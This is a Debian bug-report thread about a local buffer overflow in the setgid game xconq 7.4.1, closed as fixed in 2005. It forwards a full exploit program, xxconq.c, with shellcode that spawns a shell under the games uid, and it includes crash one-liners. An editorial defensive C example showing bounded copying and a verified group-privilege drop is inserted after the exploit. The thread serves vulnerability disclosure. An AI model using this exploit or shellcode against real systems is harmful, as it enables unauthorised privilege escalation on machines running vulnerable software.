Your message dated Wed, 02 Nov 2005 11:16:57 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Fixed in xconq 7.4.1-1
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 27 Dec 2000 07:41:27 +0000
>From [EMAIL PROTECTED] Wed Dec 27 01:41:27 2000
Return-path: <[EMAIL PROTECTED]>
Received: from kitenet.net [198.144.200.155] (postfix)
        by master.debian.org with esmtp (Exim 3.12 1 (Debian))
        id 14BBDC-0003HR-00; Wed, 27 Dec 2000 01:41:26 -0600
Received: by kitenet.net (Postfix, from userid 500)
        id 6A33EBC141; Tue, 26 Dec 2000 23:41:25 -0800 (PST)
Date: Tue, 26 Dec 2000 23:41:25 -0800
From: Joey Hess <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: FWD: xconq7.4.1 exploit.
Message-ID: <[EMAIL PROTECTED]>
Mail-Followup-To: Joey Hess <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
        [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Delivered-To: [EMAIL PROTECTED]

Package: xconq
Severity: important

If this exploit actually works, we're vulnerable. Doesn't build for
me, but xconq is sgid and has buffer overflows:

[EMAIL PROTECTED]:~>xconq -L `perl -e "print 'a' x 10000"` >/dev/null
zsh: segmentation fault  xconq -L `perl -e "print 'a' x 10000"` > /dev/null

[EMAIL PROTECTED]:~>xconq -g `perl -e "print 'a' x 10000"` >|/dev/null
zsh: segmentation fault  xconq -g `perl -e "print 'a' x 10000"` >| /dev/null

Not a good sign.

----- Forwarded message from Chris Sharp <[EMAIL PROTECTED]> -----

From: Chris Sharp <[EMAIL PROTECTED]>
Date:         Mon, 25 Dec 2000 07:18:07 -0000
To: [email protected]
Subject:      xconq7.4.1 exploit.
X-Mailer: Security Focus
Reply-To: [EMAIL PROTECTED]

i saw some mention of xconq on bugtraq, but no exploit. decided to take a
lookie at it...took a little more work than expected to successfully
exploit (without a display), but nonetheless:

original (unwrapped/working):
http://realhalo.org/xxconq.c


xxconq.c(wrapped):
--------------------------------------------------
/* (linux)xconq[v7.4.1] local buffer overflow, by: [EMAIL PROTECTED]  this
    will give you uid=games on systems with xconq.  this exploit was slightly
    more work than i thought it was going to be.  i originally wrote this
    exploit for the -g parameter.  but, via the -g parameter you must have a
    display.  via this -L parameter you do not need a display, but it is much
    more exact.  in this method you have to fill the XCONQCONFIG environmental
    variable to a certain point to be able to overwrite the eip via the -L
    parameter.  (64 bytes is more than enough).  i also needed to modify some
    shellcode for this.  all in all, too much work for what it is worth.

    example(test usage):
------------------------------------------------------------------------------
bash# echo id|(id;cc xxconq.c -o xxconq;./xxconq -5000 0 20 507)
fakehalo: uid:1000 gid:100. [euid:1000 egid:100]
[ (linux)xconq[v7.4.1] local buffer overflow, by: [EMAIL PROTECTED] ]
*** [data]: addr: 0xbffffdc4, offset: -5000, alignment: 0, uid: 20, cap: 507.
*** [data]: sizeof(bofeip): 512, sizeof(env): 4096, sizeof(push): 64, nop=3579.

              Welcome to X11 Xconq version 7.4.1 (Dec 2000)

Xconq is free software and you are welcome to distribute copies of it
under certain conditions; type "o copying" to see the conditions.
There is absolutely no warranty for Xconq; type "o warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------

    note: built and tested on slackware.  some other overflowable functions i
          will mention are the -g parameter and the XCONQLIB environmental
          variable,  both of those overflows require a display to exploit.
          this program also has an odd usage of setuid(); in it to drop its
          privileges -- making it possible to break.  and yes, i squished the
          code together on purpose.  why? i am a *x80 resolution kinda guy :/.
*/
#include <stdio.h>   // headers the code relies on (added; the original had none)
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define PATH "/usr/local/bin/xconq"     // path to xconq7.4.1.
#define DEFAULT_ALIGN 0                 // generic alignment.
#define DEFAULT_OFFSET -5000            // generic offset. (from bufsize)
#define DEFAULT_UID 20                  // user id of games.
#define DEFAULT_CAP 507                 // exact buffer cut off point.
#define FILLER 0x78                     // filling character, for misc use.
static char exec[]= // setreuid()+exec(): [EMAIL PROTECTED]
 "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
 "\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
 "\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
 "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
 "\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bofeip[512],env[4096],push[64];int i,offset,align,uid,cap;long ret;
 printf("[ (linux)xconq[v7.4.1] local buffer overflow, by: [EMAIL PROTECTED]"
 ". ]\n");
 if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
  printf("*** [syntax]: %s [offset] [alignment] [user id] [capoff buffer value"
  "].\n",argv[0]);
  printf("*** [required]: argument alignment value must be: 0-3.\n");
  printf("*** [required]: argument user id value must be: 1-255.\n");
  printf("*** [required]: argument cap value must be: 1-%d.\n",sizeof(bofeip));
  exit(0);
 }
 if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){
   printf("*** [error]: ignored argument alignment value: %s. (use 0-3)\n",
   argv[2]);align=DEFAULT_ALIGN;
  }
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 if(argc>3){
  if(atoi(argv[3])<1||atoi(argv[3])>255){
   printf("*** [error]: ignored argument uid value: %s. (use 1-255)\n",
   argv[3]);uid=DEFAULT_UID;
  }
  else{uid=atoi(argv[3]);}
 }
 else{uid=DEFAULT_UID;}
 if(argc>4){
  if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
   printf("*** [error]: ignored argument cap value: %s. (use 1-%d)\n",argv[4],
   sizeof(bofeip));cap=DEFAULT_CAP;
  }
  else{cap=atoi(argv[4]);}
 }
 else{cap=DEFAULT_CAP;}
 ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
 for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long *)&bofeip[i]=ret;}
 bofeip[cap]=0x0;
 for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
 exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
 env[(i+strlen(exec))]=0x0;printf("*** [data]: addr: 0x%lx, offset: %d, alignm"
 "ent: %d, uid: %d, cap: %d.\n*** [data]: sizeof(bofeip): %d, sizeof(env): %d,"
 " sizeof(push): %d, nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
 sizeof(env),sizeof(push),(strlen(env)-strlen((char *)strrchr(env,0x90))+1));
 setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
 push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
 if(execl(PATH,PATH,"-L",bofeip,0)){
  printf("*** [error]: could not execute %s properly.\n",argv[0]);
  exit(-1);
 }
}

----- End forwarded message -----

-- 
see shy jo
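The report above raises two points a maintainer has to fix: a fixed-size buffer filled from a command-line option or environment variable with no length check (the 10000-byte -L and -g arguments crash the binary), and a set-group-ID privilege drop that the exploit author describes as breakable. The following is an added example written for this page; it is not code from the bug report, from the forwarded exploit, or from xconq. It shows the unchecked copy pattern beside a bounded replacement, and a group-privilege drop that is verified rather than assumed. Every identifier in it (OPTION_MAX, unsafe_set_option, safe_set_option, drop_group_privileges) and the 256-byte buffer size are hypothetical; xconq's real buffer sizes are not stated on the page.

```c
/* Added example for the xconq report: bounded option handling and a verified
 * set-group-ID drop. All names and sizes here are hypothetical (not xconq's). */
#define _XOPEN_SOURCE 700   /* declares setregid() under strict -std= modes */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define OPTION_MAX 256   /* constructed buffer size; xconq's real sizes are unknown */

/* The unchecked pattern the segfaults in the report point to: an argv or getenv
 * value is copied into a fixed-size buffer with no bound, so an argument of
 * 10000 bytes runs past the end of dst and over whatever follows it. */
void unsafe_set_option(char dst[OPTION_MAX], const char *src)
{
    strcpy(dst, src);   /* no length check at all */
}

/* Bounded replacement: refuse anything that does not fit together with its
 * terminator, and never leave dst without a NUL. Returns 0 on success, -1 on
 * rejection, so the caller can exit with a usage error instead of continuing. */
int safe_set_option(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (len >= cap) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Permanently drop a set-group-ID binary to the invoking user's group.
 * setregid(gid, gid) replaces the real and effective gid (and, on Linux, the
 * saved set-gid as well), unlike a lone setgid()/setuid() call in an
 * unprivileged process, which changes only the effective id and leaves the
 * saved id available to regain. Returns 0 only when the drop is verified. */
int drop_group_privileges(void)
{
    gid_t gid = getgid();
    if (setregid(gid, gid) != 0)
        return -1;
    /* Check the result instead of trusting the call: a partial drop is a failure. */
    if (getegid() != gid || getgid() != gid)
        return -1;
    return 0;
}

/* Benign input: a short option is copied intact (returns 0). */
int accept_short_argument(void)
{
    char opt[OPTION_MAX];
    if (safe_set_option(opt, sizeof opt, "standard") != 0)
        return -1;
    return strcmp(opt, "standard");
}

/* Mirror of the report's test input: 10000 'a' bytes (constructed here).
 * With the bounded copy this returns -1 and nothing outside opt is written. */
int reject_long_argument(void)
{
    static char huge[10001];
    char opt[OPTION_MAX];
    memset(huge, 'a', sizeof huge - 1);
    huge[sizeof huge - 1] = '\0';
    return safe_set_option(opt, sizeof opt, huge);
}

int main(void)
{
    /* Drop privileges first and refuse to run if that did not take effect. */
    if (drop_group_privileges() != 0) {
        fputs("group privilege drop failed, refusing to continue\n", stderr);
        return 1;
    }
    printf("short option accepted: %d\n", accept_short_argument());
    printf("10000-byte option rejected: %d\n", reject_long_argument());
    return 0;
}
```

Run as an ordinary user the drop is a no-op that still verifies, which is the point: the check is cheap, and a binary that cannot confirm its own privilege level should stop rather than go on to parse attacker-controlled input.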

---------------------------------------
Received: (at 80576-done) by bugs.debian.org; 2 Nov 2005 10:17:15 +0000
>From [EMAIL PROTECTED] Wed Nov 02 02:17:15 2005
Return-path: <[EMAIL PROTECTED]>
Received: from mail.irb.hr [161.53.22.8] (UNKNOWN)
        by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
        id 1EXFgA-0007vx-00; Wed, 02 Nov 2005 02:17:15 -0800
Received: from diziet.irb.hr (diziet.irb.hr [161.53.22.31])
        by mail.irb.hr (8.13.3/8.13.3/Debian-6) with ESMTP id jA2AGskp000686;
        Wed, 2 Nov 2005 11:16:54 +0100
Received: from diziet.irb.hr (localhost [127.0.0.1])
        by diziet.irb.hr (8.13.5/8.13.5/Debian-3) with ESMTP id jA2AGvXJ020994;
        Wed, 2 Nov 2005 11:16:57 +0100
Received: (from [EMAIL PROTECTED])
        by diziet.irb.hr (8.13.5/8.13.5/Submit) id jA2AGvrd020992;
        Wed, 2 Nov 2005 11:16:57 +0100
From: Matej Vela <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
        [EMAIL PROTECTED], [EMAIL PROTECTED],
        [EMAIL PROTECTED], [EMAIL PROTECTED],
        [EMAIL PROTECTED], [EMAIL PROTECTED],
        [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Fixed in xconq 7.4.1-1
Date: Wed, 02 Nov 2005 11:16:57 +0100
Message-ID: <[EMAIL PROTECTED]>
User-Agent: Gnus/5.110004 (No Gnus v0.4) Emacs/21.4 (gnu/linux)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Scanned-By: MIMEDefang 2.51 on 161.53.22.8
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level: 
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no 
        version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 10

Source: xconq
Source-Version: 7.4.1-1

This was marked as an NMU by mistake:

  xconq (7.4.1-1) unstable; urgency=low

    * New maintainer.
    * Applied patch from Andreas Rottmann <[EMAIL PROTECTED]> (Closes: 
bug#80576)
    * Applied patch from James Morrison <[EMAIL PROTECTED]>
      (Closes: bug#107313)
    * New upstream version (Closes: bug#107410, bug#125961, bug#67474,
      bug#86306, bug#67934)
    * New versions of config.sub and config.guess were added.
      (Closes: bug#90043, bug#78672)
    * The package was rebuilt from scratch (Closes: bug#110222)

   -- Timo Benk <[EMAIL PROTECTED]>  Wed, 27 Feb 2002 19:25:13 +0100
